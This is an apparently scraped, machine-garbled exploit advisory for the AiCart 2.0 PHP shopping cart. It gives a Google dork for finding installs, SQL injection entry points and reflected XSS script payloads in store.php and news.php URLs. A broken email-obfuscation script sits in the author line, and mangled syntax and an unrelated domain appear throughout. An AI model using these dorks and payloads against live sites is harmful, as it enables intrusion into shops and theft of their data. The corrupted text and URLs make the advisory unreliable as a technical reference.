================================== [AiCart 2.0 Multiple Vulnerabilities]
========================================================== ======================
[Date] [18.06.2011]
[Software URL] [http://www.aicart.ca/]
[Version] [2.0]
[Google Dork] [inurl:/store. php? Action = view_product pid =]
[System] [PHP]
[Testing System] [Fedora]
[Risk Level] [High]
[CVE] [-]
===Autor Details ============================================= ================
[Autor] [takeshix]
[Autor Contact] [takeshix.query@googlemail.com <SCRIPT type = text/javascript>
/* <! [CDATA [*/
(Function () {try {var s, a, I, j, r, c, l = document. getElementById ("_ cf_email _"); a = l. className; if (a) {s =; r = parseInt (. substr (0, 2), 16); for (j = 2;. length-j; j + = 2) {c = parseInt (. substr (j, 2), 16) ^ r; s + = String. fromCharCode (c);} s = document. createTextNode (s); l. parentNode. replaceChild (s, l) ;}} catch (e ){}})();
/*]> */
</SCRIPT>]
======================================================= ====================================
[SQLi] http://www.bkjia.com/store.php? Action = view_product? Pid =
[SQLi] http://www.bkjia.com/store.php? Rid =
[SQLi] http://www.bkjia.com/news.php? Nid = & action = view
[XSS] alert (takeshix)Http://www.bkjia.com/store.php? Action = view_product? Pid = <script> alert (takeshix) </script>
[XSS] alert (takeshix)Http://www.bkjia.com/store.php? Rid = <script> alert (takeshix) </script>
[Xss] alert (takeshix)& Action = view "> http://www.bkjia.com/news.php? Nid = <script> alert (takeshix) </script> & action = view
========================================================== ====================
[Hackademics] [DSU] [UNITS]
========================================================== =====
[Hacktivistas]
Fix: filter.